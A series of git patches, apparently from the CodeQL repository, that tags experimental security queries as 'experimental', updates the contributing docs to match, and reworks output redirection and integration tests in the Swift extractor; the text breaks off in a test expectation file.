java/unsafe-deserialization-spring-exporter-in-configuration-class * @tags security + * experimental * external/cwe/cwe-502 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeSpringExporterInXMLConfiguration.ql b/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeSpringExporterInXMLConfiguration.ql index c2a8721e643..d580d983950 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeSpringExporterInXMLConfiguration.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeSpringExporterInXMLConfiguration.ql @@ -8,6 +8,7 @@ * @precision high * @id java/unsafe-deserialization-spring-exporter-in-xml-configuration * @tags security + * experimental * external/cwe/cwe-502 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-522/InsecureLdapAuth.ql b/java/ql/src/experimental/Security/CWE/CWE-522/InsecureLdapAuth.ql index de6034e9466..5f2bda49f7c 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-522/InsecureLdapAuth.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-522/InsecureLdapAuth.ql @@ -6,6 +6,7 @@ * @precision medium * @id java/insecure-ldap-auth * @tags security + * experimental * external/cwe/cwe-522 * external/cwe/cwe-319 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-548/InsecureDirectoryConfig.ql b/java/ql/src/experimental/Security/CWE/CWE-548/InsecureDirectoryConfig.ql index e4bc4b8912f..55c55092104 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-548/InsecureDirectoryConfig.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-548/InsecureDirectoryConfig.ql @@ -9,6 +9,7 @@ * @precision medium * @id java/server-directory-listing * @tags security + * experimental * external/cwe/cwe-548 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-552/UnsafeUrlForward.ql b/java/ql/src/experimental/Security/CWE/CWE-552/UnsafeUrlForward.ql index e7c70a695b6..aa27fd9773f 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-552/UnsafeUrlForward.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-552/UnsafeUrlForward.ql @@ -7,6 +7,7 @@ * @precision high * @id java/unsafe-url-forward-dispatch-load * @tags security + * experimental * external/cwe-552 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-555/CredentialsInPropertiesFile.ql b/java/ql/src/experimental/Security/CWE/CWE-555/CredentialsInPropertiesFile.ql index 1ba429bd752..3c5d8e01856 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-555/CredentialsInPropertiesFile.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-555/CredentialsInPropertiesFile.ql @@ -6,6 +6,7 @@ * @precision high * @id java/credentials-in-properties * @tags security + * experimental * external/cwe/cwe-555 * external/cwe/cwe-256 * external/cwe/cwe-260 diff --git a/java/ql/src/experimental/Security/CWE/CWE-555/PasswordInConfigurationFile.ql b/java/ql/src/experimental/Security/CWE/CWE-555/PasswordInConfigurationFile.ql index d61119fc853..e13e69dfa6e 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-555/PasswordInConfigurationFile.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-555/PasswordInConfigurationFile.ql @@ -6,6 +6,7 @@ * @precision medium * @id java/password-in-configuration * @tags security + * experimental * external/cwe/cwe-555 * external/cwe/cwe-256 * external/cwe/cwe-260 diff --git a/java/ql/src/experimental/Security/CWE/CWE-598/SensitiveGetQuery.ql b/java/ql/src/experimental/Security/CWE/CWE-598/SensitiveGetQuery.ql index 45ab668af48..b436c3ccabd 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-598/SensitiveGetQuery.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-598/SensitiveGetQuery.ql @@ -6,6 +6,7 @@ * @precision medium * @id java/sensitive-query-with-get * @tags security + * experimental * external/cwe/cwe-598 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-600/UncaughtServletException.ql b/java/ql/src/experimental/Security/CWE/CWE-600/UncaughtServletException.ql index f3ab1f166e7..14149c784a0 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-600/UncaughtServletException.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-600/UncaughtServletException.ql @@ -9,6 +9,7 @@ * @precision medium * @id java/uncaught-servlet-exception * @tags security + * experimental * external/cwe/cwe-600 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-601/SpringUrlRedirect.ql b/java/ql/src/experimental/Security/CWE/CWE-601/SpringUrlRedirect.ql index 3cef2b4fc41..a9995638793 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-601/SpringUrlRedirect.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-601/SpringUrlRedirect.ql @@ -7,6 +7,7 @@ * @precision high * @id java/spring-unvalidated-url-redirection * @tags security + * experimental * external/cwe/cwe-601 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-611/XXE.ql b/java/ql/src/experimental/Security/CWE/CWE-611/XXE.ql index 0e1fdd72223..563164aa155 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-611/XXE.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-611/XXE.ql @@ -8,6 +8,7 @@ * @precision high * @id java/xxe-with-experimental-sinks * @tags security + * experimental * external/cwe/cwe-611 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-611/XXELocal.ql b/java/ql/src/experimental/Security/CWE/CWE-611/XXELocal.ql index 2d3ee9ec785..aad3674e969 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-611/XXELocal.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-611/XXELocal.ql @@ -10,6 +10,7 @@ * @precision medium * @id java/xxe-local-experimental-sinks * @tags security + * experimental * external/cwe/cwe-611 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-625/PermissiveDotRegex.ql b/java/ql/src/experimental/Security/CWE/CWE-625/PermissiveDotRegex.ql index 7319c75320a..b24b36053b8 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-625/PermissiveDotRegex.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-625/PermissiveDotRegex.ql @@ -7,6 +7,7 @@ * @precision high * @id java/permissive-dot-regex * @tags security + * experimental * external/cwe-625 * external/cwe-863 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-652/XQueryInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-652/XQueryInjection.ql index 0bb85272f08..bf2d8bc2747 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-652/XQueryInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-652/XQueryInjection.ql @@ -7,6 +7,7 @@ * @precision high * @id java/xquery-injection * @tags security + * experimental * external/cwe/cwe-652 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-665/InsecureRmiJmxEnvironmentConfiguration.ql b/java/ql/src/experimental/Security/CWE/CWE-665/InsecureRmiJmxEnvironmentConfiguration.ql index 9733ccf7b55..f69630bfff2 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-665/InsecureRmiJmxEnvironmentConfiguration.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-665/InsecureRmiJmxEnvironmentConfiguration.ql @@ -4,6 +4,7 @@ * @kind problem * @problem.severity error * @tags security + * experimental * external/cwe/cwe-665 * @precision high * @id java/insecure-rmi-jmx-server-initialization diff --git a/java/ql/src/experimental/Security/CWE/CWE-755/NFEAndroidDoS.ql b/java/ql/src/experimental/Security/CWE/CWE-755/NFEAndroidDoS.ql index 9793430a2ee..1682c8e03a1 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-755/NFEAndroidDoS.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-755/NFEAndroidDoS.ql @@ -9,6 +9,7 @@ * @precision medium * @id java/android/nfe-local-android-dos * @tags security + * experimental * external/cwe/cwe-755 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-759/HashWithoutSalt.ql b/java/ql/src/experimental/Security/CWE/CWE-759/HashWithoutSalt.ql index bea7faff694..544af6489a0 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-759/HashWithoutSalt.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-759/HashWithoutSalt.ql @@ -6,6 +6,7 @@ * @precision low * @id java/hash-without-salt * @tags security + * experimental * external/cwe/cwe-759 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-939/IncorrectURLVerification.ql b/java/ql/src/experimental/Security/CWE/CWE-939/IncorrectURLVerification.ql index 662a1f0f495..bd287fc4a39 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-939/IncorrectURLVerification.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-939/IncorrectURLVerification.ql @@ -8,6 +8,7 @@ * @precision medium * @id java/incorrect-url-verification * @tags security + * experimental * external/cwe/cwe-939 */ diff --git a/javascript/ql/src/experimental/Security/CWE-094/UntrustedCheckout.ql b/javascript/ql/src/experimental/Security/CWE-094/UntrustedCheckout.ql index 08c63450135..8f9622fe6e7 100644 --- a/javascript/ql/src/experimental/Security/CWE-094/UntrustedCheckout.ql +++ b/javascript/ql/src/experimental/Security/CWE-094/UntrustedCheckout.ql @@ -9,6 +9,7 @@ * @id js/actions/pull-request-target * @tags actions * security + * experimental * external/cwe/cwe-094 */ diff --git a/javascript/ql/src/experimental/Security/CWE-340/TokenBuiltFromUUID.ql b/javascript/ql/src/experimental/Security/CWE-340/TokenBuiltFromUUID.ql index 2c3b5a59eee..a2437fa670c 100644 --- a/javascript/ql/src/experimental/Security/CWE-340/TokenBuiltFromUUID.ql +++ b/javascript/ql/src/experimental/Security/CWE-340/TokenBuiltFromUUID.ql @@ -8,6 +8,7 @@ * @security-severity 5 * @id js/predictable-token * @tags security + * experimental * external/cwe/cwe-340 */ diff --git a/javascript/ql/src/experimental/Security/CWE-918/SSRF.ql b/javascript/ql/src/experimental/Security/CWE-918/SSRF.ql index 426a8a6f794..ce4d3f7791c 100644 --- a/javascript/ql/src/experimental/Security/CWE-918/SSRF.ql +++ b/javascript/ql/src/experimental/Security/CWE-918/SSRF.ql @@ -6,6 +6,7 @@ * @problem.severity error * @precision medium * @tags security + * experimental * external/cwe/cwe-918 */ diff --git a/python/ql/src/experimental/Security/CWE-022/ZipSlip.ql b/python/ql/src/experimental/Security/CWE-022/ZipSlip.ql index a914b938b96..aea193dde36 100644 --- a/python/ql/src/experimental/Security/CWE-022/ZipSlip.ql +++ b/python/ql/src/experimental/Security/CWE-022/ZipSlip.ql @@ -9,6 +9,7 @@ * @security-severity 7.5 * @precision high * @tags security + * experimental * external/cwe/cwe-022 */ diff --git a/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql b/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql index 80462fc91c0..178e1e28f43 100755 --- a/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql +++ b/python/ql/src/experimental/Security/CWE-022bis/TarSlipImprov.ql @@ -9,6 +9,7 @@ * @security-severity 7.5 * @precision high * @tags security + * experimental * external/cwe/cwe-022 */ diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql b/python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql index 873c8035e2e..cbc3536ad7d 100644 --- a/python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql +++ b/python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql @@ -6,6 +6,7 @@ * @precision high * @id py/template-injection * @tags security + * experimental * external/cwe/cwe-074 */ diff --git a/python/ql/src/experimental/Security/CWE-079/ReflectedXSS.ql b/python/ql/src/experimental/Security/CWE-079/ReflectedXSS.ql index 46382ad296d..468cef01f7d 100644 --- a/python/ql/src/experimental/Security/CWE-079/ReflectedXSS.ql +++ b/python/ql/src/experimental/Security/CWE-079/ReflectedXSS.ql @@ -8,6 +8,7 @@ * @sub-severity high * @id py/reflective-xss-email * @tags security + * experimental * external/cwe/cwe-079 * external/cwe/cwe-116 */ diff --git a/python/ql/src/experimental/Security/CWE-091/Xslt.ql b/python/ql/src/experimental/Security/CWE-091/Xslt.ql index 47cb8417b96..77f405f5f5a 100644 --- a/python/ql/src/experimental/Security/CWE-091/Xslt.ql +++ b/python/ql/src/experimental/Security/CWE-091/Xslt.ql @@ -7,6 +7,7 @@ * @precision high * @id py/xslt-injection * @tags security + * experimental * external/cwe/cwe-643 */ diff --git a/python/ql/src/experimental/Security/CWE-113/HeaderInjection.ql b/python/ql/src/experimental/Security/CWE-113/HeaderInjection.ql index 6c1170a5e72..65305d2f3b5 100644 --- a/python/ql/src/experimental/Security/CWE-113/HeaderInjection.ql +++ b/python/ql/src/experimental/Security/CWE-113/HeaderInjection.ql @@ -6,6 +6,7 @@ * @problem.severity error * @id py/header-injection * @tags security + * experimental * external/cwe/cwe-113 * external/cwe/cwe-079 */ diff --git a/python/ql/src/experimental/Security/CWE-1236/CsvInjection.ql b/python/ql/src/experimental/Security/CWE-1236/CsvInjection.ql index a570461add1..28a68dd78df 100644 --- a/python/ql/src/experimental/Security/CWE-1236/CsvInjection.ql +++ b/python/ql/src/experimental/Security/CWE-1236/CsvInjection.ql @@ -6,6 +6,7 @@ * @problem.severity error * @id py/csv-injection * @tags security + * experimental * external/cwe/cwe-1236 */ diff --git a/python/ql/src/experimental/Security/CWE-287/ImproperLdapAuth.ql b/python/ql/src/experimental/Security/CWE-287/ImproperLdapAuth.ql index d4d4425aa0a..22fc39f09f5 100644 --- a/python/ql/src/experimental/Security/CWE-287/ImproperLdapAuth.ql +++ b/python/ql/src/experimental/Security/CWE-287/ImproperLdapAuth.ql @@ -5,6 +5,7 @@ * @problem.severity warning * @id py/improper-ldap-auth * @tags security + * experimental * external/cwe/cwe-287 */ diff --git a/python/ql/src/experimental/Security/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql b/python/ql/src/experimental/Security/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql index c9687b17821..5799e0193ce 100644 --- a/python/ql/src/experimental/Security/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql +++ b/python/ql/src/experimental/Security/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql @@ -3,6 +3,7 @@ * @description Using version v1 of Azure Storage client-side encryption is insecure, and may enable an attacker to decrypt encrypted data * @kind problem * @tags security + * experimental * cryptography * external/cwe/cwe-327 * @id py/azure-storage/unsafe-client-side-encryption-in-use diff --git a/python/ql/src/experimental/Security/CWE-338/InsecureRandomness.ql b/python/ql/src/experimental/Security/CWE-338/InsecureRandomness.ql index 730de037c1f..476906283aa 100644 --- a/python/ql/src/experimental/Security/CWE-338/InsecureRandomness.ql +++ b/python/ql/src/experimental/Security/CWE-338/InsecureRandomness.ql @@ -9,6 +9,7 @@ * @precision high * @id py/insecure-randomness * @tags security + * experimental * external/cwe/cwe-338 */ diff --git a/python/ql/src/experimental/Security/CWE-340/TokenBuiltFromUUID.ql b/python/ql/src/experimental/Security/CWE-340/TokenBuiltFromUUID.ql index 44f6b45c3ea..711abdb2f33 100644 --- a/python/ql/src/experimental/Security/CWE-340/TokenBuiltFromUUID.ql +++ b/python/ql/src/experimental/Security/CWE-340/TokenBuiltFromUUID.ql @@ -8,6 +8,7 @@ * @security-severity 5 * @id py/predictable-token * @tags security + * experimental * external/cwe/cwe-340 */ diff --git a/python/ql/src/experimental/Security/CWE-347/JWTEmptyKeyOrAlgorithm.ql b/python/ql/src/experimental/Security/CWE-347/JWTEmptyKeyOrAlgorithm.ql index adff8dc173f..b12ed865a8c 100644 --- a/python/ql/src/experimental/Security/CWE-347/JWTEmptyKeyOrAlgorithm.ql +++ b/python/ql/src/experimental/Security/CWE-347/JWTEmptyKeyOrAlgorithm.ql @@ -5,6 +5,7 @@ * @problem.severity warning * @id py/jwt-empty-secret-or-algorithm * @tags security + * experimental */ // determine precision above diff --git a/python/ql/src/experimental/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.ql b/python/ql/src/experimental/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.ql index 0cb801cb849..834cd885718 100644 --- a/python/ql/src/experimental/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.ql +++ b/python/ql/src/experimental/Security/CWE-347/JWTMissingSecretOrPublicKeyVerification.ql @@ -5,6 +5,7 @@ * @problem.severity warning * @id py/jwt-missing-verification * @tags security + * experimental * external/cwe/cwe-347 */ diff --git a/python/ql/src/experimental/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql b/python/ql/src/experimental/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql index 667894e896e..aec637269ac 100644 --- a/python/ql/src/experimental/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql +++ b/python/ql/src/experimental/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql @@ -7,6 +7,7 @@ * @precision high * @id py/ip-address-spoofing * @tags security + * experimental * external/cwe/cwe-348 */ diff --git a/python/ql/src/experimental/Security/CWE-522/LDAPInsecureAuth.ql b/python/ql/src/experimental/Security/CWE-522/LDAPInsecureAuth.ql index 88925d56a15..960ef9a671a 100644 --- a/python/ql/src/experimental/Security/CWE-522/LDAPInsecureAuth.ql +++ b/python/ql/src/experimental/Security/CWE-522/LDAPInsecureAuth.ql @@ -5,6 +5,7 @@ * @problem.severity error * @id py/insecure-ldap-auth * @tags security + * experimental * external/cwe/cwe-522 * external/cwe/cwe-523 */ diff --git a/python/ql/src/experimental/Security/CWE-611/SimpleXmlRpcServer.ql b/python/ql/src/experimental/Security/CWE-611/SimpleXmlRpcServer.ql index edd19bfdfd9..62ca6219b8b 100644 --- a/python/ql/src/experimental/Security/CWE-611/SimpleXmlRpcServer.ql +++ b/python/ql/src/experimental/Security/CWE-611/SimpleXmlRpcServer.ql @@ -6,6 +6,7 @@ * @precision high * @id py/simple-xml-rpc-server-dos * @tags security + * experimental * external/cwe/cwe-776 */ diff --git a/python/ql/src/experimental/Security/CWE-614/CookieInjection.ql b/python/ql/src/experimental/Security/CWE-614/CookieInjection.ql index 546c3d5e7a2..894a69753d9 100644 --- a/python/ql/src/experimental/Security/CWE-614/CookieInjection.ql +++ b/python/ql/src/experimental/Security/CWE-614/CookieInjection.ql @@ -5,6 +5,7 @@ * @problem.severity error * @id py/cookie-injection * @tags security + * experimental * external/cwe/cwe-614 */ diff --git a/python/ql/src/experimental/Security/CWE-614/InsecureCookie.ql b/python/ql/src/experimental/Security/CWE-614/InsecureCookie.ql index 2fe2aee6f3e..78cfdc9f3df 100644 --- a/python/ql/src/experimental/Security/CWE-614/InsecureCookie.ql +++ b/python/ql/src/experimental/Security/CWE-614/InsecureCookie.ql @@ -8,6 +8,7 @@ * @precision ??? * @id py/insecure-cookie * @tags security + * experimental * external/cwe/cwe-614 */ diff --git a/python/ql/src/experimental/Security/CWE-943/NoSQLInjection.ql b/python/ql/src/experimental/Security/CWE-943/NoSQLInjection.ql index 87e003fcc45..a73202ca082 100644 --- a/python/ql/src/experimental/Security/CWE-943/NoSQLInjection.ql +++ b/python/ql/src/experimental/Security/CWE-943/NoSQLInjection.ql @@ -6,6 +6,7 @@ * @problem.severity error * @id py/nosql-injection * @tags security + * experimental * external/cwe/cwe-943 */ diff --git a/ruby/ql/src/experimental/cwe-807/ConditionalBypass.ql b/ruby/ql/src/experimental/cwe-807/ConditionalBypass.ql index 60a05351d91..96f5dc91a8c 100644 --- a/ruby/ql/src/experimental/cwe-807/ConditionalBypass.ql +++ b/ruby/ql/src/experimental/cwe-807/ConditionalBypass.ql @@ -7,6 +7,7 @@ * @precision medium * @id rb/user-controlled-bypass * @tags security + * experimental * external/cwe/cwe-807 * external/cwe/cwe-290 */ diff --git a/ruby/ql/src/experimental/decompression-api/DecompressionApi.ql b/ruby/ql/src/experimental/decompression-api/DecompressionApi.ql index 280569b10ee..7dc37f19bc8 100644 --- a/ruby/ql/src/experimental/decompression-api/DecompressionApi.ql +++ b/ruby/ql/src/experimental/decompression-api/DecompressionApi.ql @@ -6,7 +6,9 @@ * @security-severity 7.8 * @precision medium * @id rb/user-controlled-file-decompression - * @tags security external/cwe/cwe-409 + * @tags security + * experimental + * external/cwe/cwe-409 */ import codeql.ruby.AST diff --git a/ruby/ql/src/experimental/improper-memoization/ImproperMemoization.ql b/ruby/ql/src/experimental/improper-memoization/ImproperMemoization.ql index 0cbfa1ec759..c3c8d2c3ec7 100644 --- a/ruby/ql/src/experimental/improper-memoization/ImproperMemoization.ql +++ b/ruby/ql/src/experimental/improper-memoization/ImproperMemoization.ql @@ -5,6 +5,7 @@ * @problem.severity warning * @precision high * @tags security + * experimental * @id rb/improper-memoization */ diff --git a/ruby/ql/src/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.ql b/ruby/ql/src/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.ql index 7a98e0cecb0..d9360e29e29 100644 --- a/ruby/ql/src/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.ql +++ b/ruby/ql/src/experimental/manually-check-http-verb/ManuallyCheckHttpVerb.ql @@ -7,6 +7,7 @@ * @precision low * @id rb/manually-checking-http-verb * @tags security + * experimental */ import codeql.ruby.AST diff --git a/ruby/ql/src/experimental/weak-params/WeakParams.ql b/ruby/ql/src/experimental/weak-params/WeakParams.ql index cf18a37283f..e164318c874 100644 --- a/ruby/ql/src/experimental/weak-params/WeakParams.ql +++ b/ruby/ql/src/experimental/weak-params/WeakParams.ql @@ -7,6 +7,7 @@ * @precision medium * @id rb/weak-params * @tags security + * experimental */ import codeql.ruby.AST From b35a1d420638784c808064faa1e208b02a791b75 Mon Sep 17 00:00:00 2001 From: turbo Date: Wed, 14 Dec 2022 17:16:38 +0100 Subject: [PATCH 037/381] Adjust docs referring to experimental queries to include details on new tagging system --- CONTRIBUTING.md | 1 + docs/experimental.md | 2 ++ 2 files changed, 3 insertions(+) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 0abd13bde5e..c97b2d96286 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -25,6 +25,7 @@ If you have an idea for a query that you would like to share with other CodeQL u Each language-specific directory contains further subdirectories that group queries based on their `@tags` or purpose. - Experimental queries and libraries are stored in the `experimental` subdirectory within each language-specific directory in the [CodeQL repository](https://github.com/github/codeql). For example, experimental Java queries and libraries are stored in `java/ql/src/experimental` and any corresponding tests in `java/ql/test/experimental`. + - Experimental queries need to include `experimental` in their `@tags` - The structure of an `experimental` subdirectory mirrors the structure of its parent directory. - Select or create an appropriate directory in `experimental` based on the existing directory structure of `experimental` or its parent directory. diff --git a/docs/experimental.md b/docs/experimental.md index 0b6eca50c17..774cc164052 100644 --- a/docs/experimental.md +++ b/docs/experimental.md @@ -2,6 +2,8 @@ In addition to [our supported queries and libraries](supported-queries.md), this repository also contains queries and libraries of a more experimental nature. Experimental queries and libraries can be improved incrementally and may eventually reach a sufficient maturity to be included in our supported queries and libraries. +Experimental security queries are included in the `experimental` [CodeQL suite](https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/configuring-code-scanning#using-queries-in-ql-packs). This suite is provided for testing purposes only, and should not be used in production code scanning workflows. + Experimental queries and libraries may not be actively maintained as the [supported](supported-queries.md) libraries evolve. They may also be changed in backwards-incompatible ways or may be removed entirely in the future without deprecation warnings. See [CONTRIBUTING.md](../CONTRIBUTING.md) for guidelines on submitting a new experimental query. From 14fd89d48235754ff320e4a44d170bb6d01553c3 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 14 Dec 2022 18:26:48 +0100 Subject: [PATCH 038/381] Swift: generalize output redirection code --- swift/extractor/main.cpp | 39 +++++++++++++------ .../frontend-invocations/Files.expected | 2 + .../posix-only/frontend-invocations/H1.swift | 1 + .../posix-only/frontend-invocations/H2.swift | 1 + .../posix-only/frontend-invocations/H3.swift | 1 + .../posix-only/frontend-invocations/build.sh | 2 + 6 files changed, 34 insertions(+), 12 deletions(-) create mode 100644 swift/integration-tests/posix-only/frontend-invocations/H1.swift create mode 100644 swift/integration-tests/posix-only/frontend-invocations/H2.swift create mode 100644 swift/integration-tests/posix-only/frontend-invocations/H3.swift diff --git a/swift/extractor/main.cpp b/swift/extractor/main.cpp index 332133323e7..11c07b42edd 100644 --- a/swift/extractor/main.cpp +++ b/swift/extractor/main.cpp @@ -37,20 +37,35 @@ static void processFrontendOptions(swift::FrontendOptions& options) { case Action::EmitModuleOnly: case Action::MergeModules: case Action::CompileModuleFromInterface: - // for module emission actions, we redirect the output to our internal artifact storage - { - swift::SupplementaryOutputPaths paths; - paths.ModuleOutputPath = - codeql::redirect(options.InputsAndOutputs.getSingleOutputFilename()).string(); - options.InputsAndOutputs.setMainAndSupplementaryOutputs(std::vector{paths.ModuleOutputPath}, - std::vector{paths}); - return; + case Action::EmitObject: { + auto& inOuts = options.InputsAndOutputs; + std::vector inputs; + inOuts.forEachInput([&](const swift::InputFile& input) { + swift::PrimarySpecificPaths psp{}; + if (std::filesystem::path output = input.getPrimarySpecificPaths().OutputFilename; + !output.empty()) { + if (output.extension() == ".swiftmodule") { + psp.OutputFilename = codeql::redirect(output); + } else { + psp.OutputFilename = "/dev/null"; + } + } + if (std::filesystem::path module = + input.getPrimarySpecificPaths().SupplementaryOutputs.ModuleOutputPath; + !module.empty()) { + psp.SupplementaryOutputs.ModuleOutputPath = codeql::redirect(module); + } + auto inputCopy = input; + inputCopy.setPrimarySpecificPaths(std::move(psp)); + inputs.push_back(std::move(inputCopy)); + return false; + }); + inOuts.clearInputs(); + for (const auto& i : inputs) { + inOuts.addInput(i); } - case Action::EmitObject: - // for object emission, we do a type check pass instead, muting output but getting the sema - // phase to run in order to extract everything - options.RequestedAction = Action::Typecheck; return; + } case Action::PrintVersion: case Action::DumpAST: case Action::PrintAST: diff --git a/swift/integration-tests/posix-only/frontend-invocations/Files.expected b/swift/integration-tests/posix-only/frontend-invocations/Files.expected index 3bc0826c1f2..7bcaeb1afa2 100644 --- a/swift/integration-tests/posix-only/frontend-invocations/Files.expected +++ b/swift/integration-tests/posix-only/frontend-invocations/Files.expected @@ -6,4 +6,6 @@ | F1.swift:0:0:0:0 | F1.swift | | F2.swift:0:0:0:0 | F2.swift | | G.swift:0:0:0:0 | G.swift | +| H1.swift:0:0:0:0 | H1.swift | +| H2.swift:0:0:0:0 | H2.swift | | file://:0:0:0:0 | | diff --git a/swift/integration-tests/posix-only/frontend-invocations/H1.swift b/swift/integration-tests/posix-only/frontend-invocations/H1.swift new file mode 100644 index 00000000000..162a2291a1a --- /dev/null +++ b/swift/integration-tests/posix-only/frontend-invocations/H1.swift @@ -0,0 +1 @@ +func h1() {} diff --git a/swift/integration-tests/posix-only/frontend-invocations/H2.swift b/swift/integration-tests/posix-only/frontend-invocations/H2.swift new file mode 100644 index 00000000000..56a1aae6e05 --- /dev/null +++ b/swift/integration-tests/posix-only/frontend-invocations/H2.swift @@ -0,0 +1 @@ +func h2() {} diff --git a/swift/integration-tests/posix-only/frontend-invocations/H3.swift b/swift/integration-tests/posix-only/frontend-invocations/H3.swift new file mode 100644 index 00000000000..2b45b033559 --- /dev/null +++ b/swift/integration-tests/posix-only/frontend-invocations/H3.swift @@ -0,0 +1 @@ +func h3() {} diff --git a/swift/integration-tests/posix-only/frontend-invocations/build.sh b/swift/integration-tests/posix-only/frontend-invocations/build.sh index 813257a085f..fb1388e427c 100755 --- a/swift/integration-tests/posix-only/frontend-invocations/build.sh +++ b/swift/integration-tests/posix-only/frontend-invocations/build.sh @@ -15,5 +15,7 @@ $FRONTEND -frontend -c -primary-file D.swift -o D.o $SDK $FRONTEND -frontend -c -primary-file E.swift Esup.swift -o E.o $SDK $FRONTEND -frontend -emit-module -primary-file F1.swift F2.swift -module-name F -o F1.swiftmodule $SDK $FRONTEND -frontend -emit-module F1.swift -primary-file F2.swift -module-name F -o F2.swiftmodule $SDK +$FRONTEND -frontend -emit-module F1.swift F2.swift -o Fs.swiftmodule $SDK $FRONTEND -frontend -merge-modules F1.swiftmodule F2.swiftmodule -o F.swiftmodule $SDK ( cd dir; $FRONTEND -frontend -c ../G.swift $SDK ) +$FRONTEND -frontend -c -primary-file H1.swift -primary-file H2.swift H3.swift -emit-module-path H1.swiftmodule -emit-module-path H2.swiftmodule -o H1.o -o H2.o $SDK From 793de3196b1883f01709a633121b7ad28eb8c44a Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Wed, 14 Dec 2022 18:34:12 +0100 Subject: [PATCH 039/381] Revert "Swift: accept test changes" This reverts commit 26ae8f177b853565fc7accefb9f83cd3b2ae7e9d. --- .../generated/decl/ModuleDecl/ModuleDecl.expected | 4 ++-- .../decl/ModuleDecl/ModuleDecl_getImportedModule.expected | 2 ++ .../generated/stmt/PoundAssertStmt/PoundAssertStmt.expected | 2 +- .../stmt/PoundAssertStmt/static_failing_assert.swift | 1 + 4 files changed, 6 insertions(+), 3 deletions(-) diff --git a/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl.expected b/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl.expected index 9f63f229ab3..e73a1739f4c 100644 --- a/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl.expected +++ b/swift/ql/test/extractor-tests/generated/decl/ModuleDecl/ModuleDecl.expected @@ -1,3 +1,3 @@ -| file://:0:0:0:0 | Foo | getModule: | file://:0:0:0:0 | Foo | getInterfaceType: | module | getName: | Foo | getNumberOfBaseTypes: | 0 | isBuiltinModule: | no | isSystemModule: | no | getNumberOfImportedModules: | 3 | getNumberOfExportedModules: | 1 | +| file://:0:0:0:0 | Foo | getModule: | file://:0:0:0:0 | Foo | getInterfaceType: | module | getName: | Foo | getNumberOfBaseTypes: | 0 | isBuiltinModule: | no | isSystemModule: | no | getNumberOfImportedModules: | 4 | getNumberOfExportedModules: 